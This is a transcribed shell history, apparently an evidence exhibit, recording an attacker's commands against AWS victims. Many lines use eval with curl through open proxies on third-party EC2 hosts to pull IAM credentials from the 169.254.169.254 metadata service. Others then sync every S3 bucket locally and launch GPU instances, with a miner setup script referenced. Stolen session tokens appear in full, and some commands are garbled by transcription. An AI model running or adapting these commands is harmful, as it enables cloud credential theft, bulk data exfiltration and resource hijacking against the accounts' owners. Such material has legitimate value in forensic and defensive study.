6783  aws ec2 authorize-security-group-ingress --group-id sg-      4f2d --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-1
6784  aws ec2 run-instances --region us-east-1 --instance-type p3.16xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-      4f2d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
6785  aws ec2 run-instances --region us-east-1 --instance-type p3.16xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-      4f2d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name us-east-1
6786  aws ec2 run-instances --region us-east-1 --instance-type p3.8xlarge --count 2 --image-id
ami-    0d3 --security-group-ids sg-      4f2d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name us-east-1
```

```
6787  aws ec2 run-instances --region us-east-1 --instance-type p3.2xlarge --count 2 --image-id
ami-      0d3 --security-group-ids sg-      4f2d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name us-east-1
6788  aws ec2 describe-instances --region us-east-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
6802  mv                          aws_scan
6803  mv                                       aws_scan
6804  mv ami-id.tar aws_scan
6807  mv deploy.sh aws_scan
6809  mv               .docker.repos aws_scan
6812  mv               aws_scan
6836  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.0.19.1:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/                    |
          | awssession.sh `
6837  eval  curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.55.114.26:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
          | awssession.sh `
6840  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.55.114.26:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
          | awssession.sh `
6841  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://35.168.25.243:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
          | awssession.sh `
6843  eval  curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://35.168.25.243:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
          | awssession.sh `
6846  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.228.22.143:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
          | awssession.sh `
6847  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir=''       '' \; mkdir
-p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
6855  aws --profile pbn --region us-east-1 s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel
--verbose dir='       '' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
6856  aws --profile       iam list-users
```

608-042

```
6858  aws --profile          ec2 describe-instances --region us-east-1
6859  aws --profile          --region us-east-1 s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel
--verbose dir='"        "' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
6879  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.88.84.246:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
|                    | awssession.sh `
6880  aws s3api list-buckets | less
6881  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.32.45.175:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials,
'                  | awssession.sh `
6882  aws --profile pbn2 --region us-east-1 s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel
--verbose dir='          '' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
6883  aws us-east-1 s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='          ' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
6884  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='        "' \;
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
6885  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.231.76.6:443 http://169.254.169.254/latest/meta-data/iam/security-credentials,
                    | awssession.sh `
6889  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.88.164.158:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                    | awssession.sh `
6890  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.52.27.18:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials,
              | awssession.sh `
6891  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.15.95.51:443
http://169.254.169.254/latest/meta-data/iam/security-credentials,                        |
                  | awssession.sh `
6892  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.253.64.237:443 http://169.254.169.254/latest/meta-data/iam/              | awssessions.h`
6893  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.253.64.237:443 http://169.254.169.254/latest/meta-data/iam/              | awssessions.sh`
6894  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.253.64.237:443 http://169.254.169.254/latest/meta-data/iam/              | awssession.sh`
6895  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.253.64.237:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
awssession.sh`
```

```
6911  cat ../aws_scan/miner/setup.sh
6922  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://13.58.150.135:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh`
6923  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir=''                "' \;
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
6924  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir=''        "' \; mkdir
-p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
6975  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.27.111.81:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
awssession.sh`
6976  aws ec2 create-key-pair
6977  aws ec2 create-key-pair --key-name default2
6979  aws ec2 authorize-security-group-ingress --group-id sg-    b864 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
6980  aws ec2 create-key-pair --region us-west-2 --key-name default
6984  aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-           8109 --associate-public-ip-address --security-group-ids sg-    b864
--instance-initiated-shutdown-behavior terminate --key-name default
6985  aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-           8109 --associate-public-ip-address --security-group-ids sg-    b864
--instance-initiated-shutdown-behavior terminate --key-name default
6986  aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 2 --image-id
ami-           8109 --associate-public-ip-address --security-group-ids sg-    b864
--instance-initiated-shutdown-behavior terminate --key-name default
7001  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.209.220.55:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
awssession.sh`
7003  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.240.191.55:443
http://169.254.169.254/latest/meta-data/iam/security-credentials               | awssession.sh`
7005  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.87.29.1:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/               |
awssession.sh`
7008  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.3.78.44:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/               |
awssession.sh`
```

```
 7011  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.59.52.123:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/     |
awssession.sh`
 7012  aws ec2 describe-instances
 7014  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.203.180.4:443
http://169.254.169.254/latest/meta-data/iam/security-credentials              | awssession.sh`
 7015  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.203.180.4:443
http://169.254.169.254/latest/meta-data/iam/security-credentials               awssession.sh`\n
 7016  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='          ' \;
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 7019  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.226.250.30:443
http://169.254.169.254/latest/meta-data/iam/security-credentials              | awssession.sh`
 7021  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://35.161.180.197:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh`
 7023  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.153.227.199:443
http://169.254.169.254/latest/meta-data/iam/security-credentials            |
awssession.sh`
 7025  curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.153.227.199:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
 7028  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://3.104.68.8:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/               |
awssession.sh`
 7030  curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.104.68.8:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/             |
awssession.sh
 7032  aws sts get-caller-identity | less
 7033  aws ec2 create-key-pair
 7035  curl `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.113.12.133:80 http://169.254.169.254/latest/meta-data/iam/security-credentials            |
awssession.sh`
 7036  aws ec2 describe-instances --region ap-northeast-2
 7037  aws ec2 describe-instances --region ap-northeast-1
 7039  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.82.117.18:80
```

```
http://169.254.169.254/latest/meta-data/iam/security-credentials              | awssession.sh`
 7040  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='                "' \;
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 7043  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.77.46.101:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/         |
awssession.sh`
 7044  aws ec2 create-key-pai --key-name default
 7045  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.214.49.137:443 http://169.254.169.254/latest/meta-data/iam/security-credentials         |
awssession.sh`
 7047  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.214.49.137:443 http://169.254.169.254/latest/meta-data/iam/security-credentials         |
awssession.sh `
 7052  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.15.95.51:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                  |
awssession.sh`
 7093  cat ~/.local/bin/awssession.sh
 7094  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"              '' \;
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws
 7095  ls /mnt/export/aws_dumps
 7116  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.229.79.123:8118 http://169.254.169.254/latest/meta-data/iam/security-credentials         |
awssession.sh`
 7119  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.229.79.123:8118 http://169.254.169.254/latest/meta-data/iam/security-credentials         |
awssession.sh`
 7120  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.36.188.73:8088
http://169.254.169.254/latest/meta-data/iam/security-credentials            | awssession.sh`
 7122  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.36.188.73:8088 http://169.254.169.254/latest/meta-data/iam/security-credentials/         |
awssession.sh`
 7124  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.52.44.117:80
http://169.254.169.254/latest/meta-data/iam/security-credentials         |
awssession.sh`
 7127  echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-17T19:41:57Z",\n  "Type" : "          ,\n
"AccessKeyId" :                  YBRV",\n  "SecretAccessKey" :
```

"███████████████████████████████2M5b",\n  "Token" :
"AgoJb3JpZ2luX2VjEFwaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAN75KyRB1x+RsQdbSzk+OV2Hz5tInN2/TwtJk3llBdvnAiEAvbjzP+o7sJ
iSghExyN8Mqwjtm+7wwMTkRxMjQXpknYMq5AMINRAAGgw3MTUxMjA5MTQ1NTMiDF997W8bZO41X4r3ByrBA42tYbiA/tPlYsVajj6uJCfz5
cW/BgPBUnLD0x9OXcwRkt7ew9WNfqczodCLd8bsHJM/OhfIvt3edmn8c5WbOD374XUZMrvrnomWJgFHqZE/iCleWLt51bbv08dYhTtuMYBj
0RZL8M7LfEZlAHwt1AVxBwXsmZceHV9eT5/H+1s+8JQC3R1ZkiSDWOD5IYorrfelRko4Dqpm1OclJb37yDvBjVEmRUkUF6GPyyyEqn6u5gK
waPLOgJhRVtdipq0WRBvLZZuW3hONoel+4h44PFITx8m/brBt5SpDIrma3xL7GDKf3iJx1g4N0KZCpJfaQy8Q3ZV8poqf3+PHouMo2Sn6yd
k/KadM0T+WK+Eh9L2656JAhfDHfNYIFe+cVOtxg2QcUoiaW4+Q27Ka0U1wLHXhUeosEAS/nAoPUN4drveSCjo0AtBv/TMan2bCBG6bBQEBf
lVQNI0pwSE+55sHONF6Jy41Mkv2TZVC9pFHUyNHSQpRA0rF+LtE4KWSkzY9tlEhZbz6+6wv47aS0tIjUWsEcrroaY5uTMB/e7Ug+BRTL715
5w8KIZayrm3hSXYwf7IRU0xdn0573GayLwqq6u7rMK6D3uUFOrMBsBQJaVOP+SIgdH9AdjoaQuitcuizIg8dIT8r7QU7+KG+WJrEk8NYFsU
6dFi+8vf/SbxOtZTi25qine32/YVo/16V4IU0PgX5cRDXyfm8jjNMn0zMYnjnzPSZOtHSaoNMFN0HtYqSA8mp5g17qGB3P10Sl60/ORFvMb
AG394dm/fuY7w5qqjbI6yDDtUdBeq2p+EDJg3D+HQphhnd+3P1/9D3LP2MZKLDxkY3YOmOs3cUxT0=",\n  "Expiration" :
"2019-04-18T02:06:22Z"\n* Connection #0 to host 52.79.227.180 left intact\n}' | awssession.sh
  7128  echo -e '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-17T19:41:57Z",\n  "Type" :
"███████████",\n  "AccessKeyId" : "███████████████YBRV",\n  "SecretAccessKey" :
"███████████████████████████████2M5b",\n  "Token" :
"AgoJb3JpZ2luX2VjEFwaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAN75KyRB1x+RsQdbSzk+OV2Hz5tInN2/TwtJk3llBdvnAiEAvbjzP+o7sJ
iSghExyN8Mqwjtm+7wwMTkRxMjQXpknYMq5AMINRAAGgw3MTUxMjA5MTQ1NTMiDF997W8bZO41X4r3ByrBA42tYbiA/tPlYsVajj6uJCfz5
cW/BgPBUnLD0x9OXcwRkt7ew9WNfqczodCLd8bsHJM/OhfIvt3edmn8c5WbOD374XUZMrvrnomWJgFHqZE/iCleWLt51bbv08dYhTtuMYBj
0RZL8M7LfEZlAHwt1AVxBwXsmZceHV9eT5/H+1s+8JQC3R1ZkiSDWOD5IYorrfelRko4Dqpm1OclJb37yDvBjVEmRUkUF6GPyyyEqn6u5gK
waPLOgJhRVtdipq0WRBvLZZuW3hONoel+4h44PFITx8m/brBt5SpDIrma3xL7GDKf3iJx1g4N0KZCpJfaQy8Q3ZV8poqf3+PHouMo2Sn6yd
k/KadM0T+WK+Eh9L2656JAhfDHfNYIFe+cVOtxg2QcUoiaW4+Q27Ka0U1wLHXhUeosEAS/nAoPUN4drveSCjo0AtBv/TMan2bCBG6bBQEBf
lVQNI0pwSE+55sHONF6Jy41Mkv2TZVC9pFHUyNHSQpRA0rF+LtE4KWSkzY9tlEhZbz6+6wv47aS0tIjUWsEcrroaY5uTMB/e7Ug+BRTL715
5w8KIZayrm3hSXYwf7IRU0xdn0573GayLwqq6u7rMK6D3uUFOrMBsBQJaVOP+SIgdH9AdjoaQuitcuizIg8dIT8r7QU7+KG+WJrEk8NYFsU
6dFi+8vf/SbxOtZTi25qine32/YVo/16V4IU0PgX5cRDXyfm8jjNMn0zMYnjnzPSZOtHSaoNMFN0HtYqSA8mp5g17qGB3P10Sl60/ORFvMb
AG394dm/fuY7w5qqjbI6yDDtUdBeq2p+EDJg3D+HQphhnd+3P1/9D3LP2MZKLDxkY3YOmOs3cUxT0=",\n  "Expiration" :
"2019-04-18T02:06:22Z"\n* Connection #0 to host 52.79.227.180 left intact\n}' | awssession.sh
  7130  echo -e '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-17T19:41:57Z",\n  "Type" :
"███████████",\n  "AccessKeyId" : "███████████████YBRV",\n  "SecretAccessKey" :
"███████████████████████████████2M5b",\n  "Token" :
"AgoJb3JpZ2luX2VjEFwaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAN75KyRB1x+RsQdbSzk+OV2Hz5tInN2/TwtJk3llBdvnAiEAvbjzP+o7sJ
iSghExyN8Mqwjtm+7wwMTkRxMjQXpknYMq5AMINRAAGgw3MTUxMjA5MTQ1NTMiDF997W8bZO41X4r3ByrBA42tYbiA/tPlYsVajj6uJCfz5
cW/BgPBUnLD0x9OXcwRkt7ew9WNfqczodCLd8bsHJM/OhfIvt3edmn8c5WbOD374XUZMrvrnomWJgFHqZE/iCleWLt51bbv08dYhTtuMYBj
0RZL8M7LfEZlAHwt1AVxBwXsmZceHV9eT5/H+1s+8JQC3R1ZkiSDWOD5IYorrfelRko4Dqpm1OclJb37yDvBjVEmRUkUF6GPyyyEqn6u5gK
waPLOgJhRVtdipq0WRBvLZZuW3hONoel+4h44PFITx8m/brBt5SpDIrma3xL7GDKf3iJx1g4N0KZCpJfaQy8Q3ZV8poqf3+PHouMo2Sn6yd
k/KadM0T+WK+Eh9L2656JAhfDHfNYIFe+cVOtxg2QcUoiaW4+Q27Ka0U1wLHXhUeosEAS/nAoPUN4drveSCjo0AtBv/TMan2bCBG6bBQEBf
lVQNI0pwSE+55sHONF6Jy41Mkv2TZVC9pFHUyNHSQpRA0rF+LtE4KWSkzY9tlEhZbz6+6wv47aS0tIjUWsEcrroaY5uTMB/e7Ug+BRTL715
5w8KIZayrm3hSXYwf7IRU0xdn0573GayLwqq6u7rMK6D3uUFOrMBsBQJaVOP+SIgdH9AdjoaQuitcuizIg8dIT8r7QU7+KG+WJrEk8NYFsU
6dFi+8vf/SbxOtZTi25qine32/YVo/16V4IU0PgX5cRDXyfm8jjNMn0zMYnjnzPSZOtHSaoNMFN0HtYqSA8mp5g17qGB3P10Sl60/ORFvMb
AG394dm/fuY7w5qqjbI6yDDtUdBeq2p+EDJg3D+HQphhnd+3P1/9D3LP2MZKLDxkY3YOmOs3cUxT0=",\n  "Expiration" :

608-047

```
"2019-04-18T02:06:22Z"\n}' | awssession.sh
 7135  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.212.222.66:443
http://169.254.169.254/latest/meta-data/iam/security-credentials▮                      |
awssession.sh`
 7163  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.74.132.51:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/▮
▮           | awssession.sh`
 7164  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.232.182.109:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/▮
| awssession.sh`
 7166  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.229.66.72:8000 http://169.254.169.254/latest/meta-data/iam/▮              |
awssession.sh`
 7180  echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-18T04:20:05Z",\n  "Type" : "▮      ",\n
"AccessKeyId" : ▮              TWNQ",\n  "SecretAccessKey" :
▮                              N5E0",\n  "Token" :
```

"AgoJb3JpZ2luX2VjEGQaCXVzLWVhc3QtMiJHMEUCICTtShXrc7bJBHFceALuXMVTeACjAdk2vgkAg0fhe2k+AiEAmWLrJ1QhMUw0VvsxDx
ST4y9XDrLHo3c9Z57MoircQTcq2gMIPRABGgwwNzQ1ODkzMTg2MTciDDOU7/idpyXdUTVUliq3A8mMwkOTtcvk80nyi6C9sz/IdpzpCdqOl
lAs2S4a1W2aR6cCS7ORy7i7KKwu2CL/8loMeZ1wbWBl5e8c/vSV8Cv3YaNmUYTD9tt37qGet8zgKfeJ7Anmct1I6+etTHFKhDOSipbkZGRe
qHqMw9YJimpt5jRLott2DB+770TjYUWnsHHolMWOcAASvs8A41wRDwAchMkHQu37SguxZtSxX8aVQVwpNZe4j/u3A0NMuPbPcIESSl/cQ+y
EFIH8IBETW/1/yp7exjDNDmAgt/Cm/QX2IsWX5KOMmhRViFoiN3mgDRkMOKKeH0Lv6Z4A8S6G3ZzuLy4l2cdOn05gta9j7HJQhsc9U5PtL/
XXtpQs7Sy+hDLJQ682y3hAeZ/FdPrJ7gVfGCDKhwAkMKo6fxX4kUW+cbekbyJw9zBoIKcOXvAB6gS7kM6M9/bR+r52LfoxMeMn/YNaFOCnD
supZ/795WNJHMrUxsYR1GAGGzp33IJVAIIbGS4ySDdtP+n9PBMbw9oZT2Y5Qway1K1nYdiSR8tF7wLsUytrDCgstxQ6AJcZOPYzRTL5P52J
gl4Hr3PE6FdP5mGye6swzfXf5QU6tAE7vdu1emaTASFFTTExxoN9hYWv7yFkm8xupFd08fx7e0CDeACTaoVn3qAJH1yXX+v1YFnZny6a7Iy
qo484Bc5kQUOeTNwazyStEyV/rKgJEsrWmAKS9fbX7HWl0KPHxsT7yt8NMtr1CCHU+UlCoH0r73ubTJSrk/5FOLFmkKgFmBWdPiSFwKhp5k
BtMZAFNeSHtxJTO+F+MuQoDDdzGuGb7wdDy5pYs4MVyASoR71GEAMPSWg=",\n  "Expiration" : "2019-04-18T10:23:09Z"\n\n}'

```
| awssession.sh
 7193  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/▮          | awssession.sh`
 7273  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.232.127.99:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/▮   | awssession.sh`
 7274  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.183.173.34:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/▮        | awssession.sh`
 7275  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.79.116.117:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/▮      | awssession.sh`
 7276  aws ec2 authorize-security-group-ingress --group-id sg-▮     594c --protocol tcp --port 22 --cidr
```

```
0.0.0.0/0 --region eu-west-2
 7277  aws ec2 create-key-pair --key-name default --region eu-west-2
 7281  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-          6eab --key-name default --associate-public-ip-address --security-group-ids sg-      594c
--instance-shutdown-behavior terminate
 7282  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-          6eab --key-name default --associate-public-ip-address --security-group-ids sg-      594c
--instance-initiated-shutdown-behavior terminate
 7283  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-          6eab --key-name default --associate-public-ip-address --security-group-ids sg-      594c
--instance-initiated-shutdown-behavior terminate
 7284  aws ec2 run-instances --region eu-west-2 --instance-type p3.2xlarge --count 2 --image-id
ami-          6eab --key-name default --associate-public-ip-address --security-group-ids sg-      594c
--instance-initiated-shutdown-behavior terminate
 7285  aws ec2 describe-instances --region eu-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
 7295  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.180.135.146:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/        | awssession.sh`
 7296  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.59.198.77:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/        | awssession.sh`
 7297  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.59.198.77:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/        | awssession.sh`
 7298  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.59.198.77:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 7299  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.183.173.34:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/        | awssession.sh`
 7300  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.196.188.120:8081
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
 7301  aws ec2 authorize-security-group-ingress --group-id sg-      99f6 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
 7305  aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-          8109 --associate-public-ip-address --security-group-ids sg-      99f6
--instance-initiated-shutdown-behavior terminate --key-name default
 7306  aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-          8109 --associate-public-ip-address --security-group-ids sg      99f6
--instance-initiated-shutdown-behavior terminate --key-name default
 7307  aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 2 --image-id
ami-          8109 --associate-public-ip-address --security-group-ids sg-      99f6
```

608-049

```
     --instance-initiated-shutdown-behavior terminate --key-name default
 7319  eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.180.135.146:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh`
 7320  aws ec2 create-key-pair --key-namedefault
 7321  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.180.135.146:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh`
 7323  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.180.135.146:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh`
 7324  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.180.135.146:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/     |
awssession.sh`
 7325  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.190.198.139:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh`
 7326  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://18.185.100.2:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/    |
awssession.sh`
 7327  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://18.185.100.2:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/         |
awssession.sh`
 7328  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.13.50.158:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/    |
awssession.sh`
 7329  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.13.50.158:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/     |
awssession.sh`
 7330  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.31.167.74:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/    |
awssession.sh`
 7331  aws ec2 authorize-security-group-ingress --group-id sg    f23e --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
 7334  aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami           8109 --associate-public-ip-address --security-group-ids sg     f23e
--instance-initiated-shutdown-behavior terminate --key-name default
 7335  aws ec2 describe-vpcs
 7336  aws ec2 describe-vpcs --region us-west-2
 7337  aws ec2 create-vpc --region us-west-2
```

```
7338  aws ec2 create-vpc --region us-west-2 --cidr-block 10.0.0.0/16
7339  aws ec2 create-security-group --group-name defaultsg-     f23e --vpc-id vpc                    20ae
--region us-west-2
7340  aws ec2 create-security-group --group-name defaultsg-     f23e --vpc-id vpc-                   20ae
--region us-west-2 --description default
7341  aws ec2 authorize-security-group-ingress --group-id sg-              7023 --protocol tcp --port 22
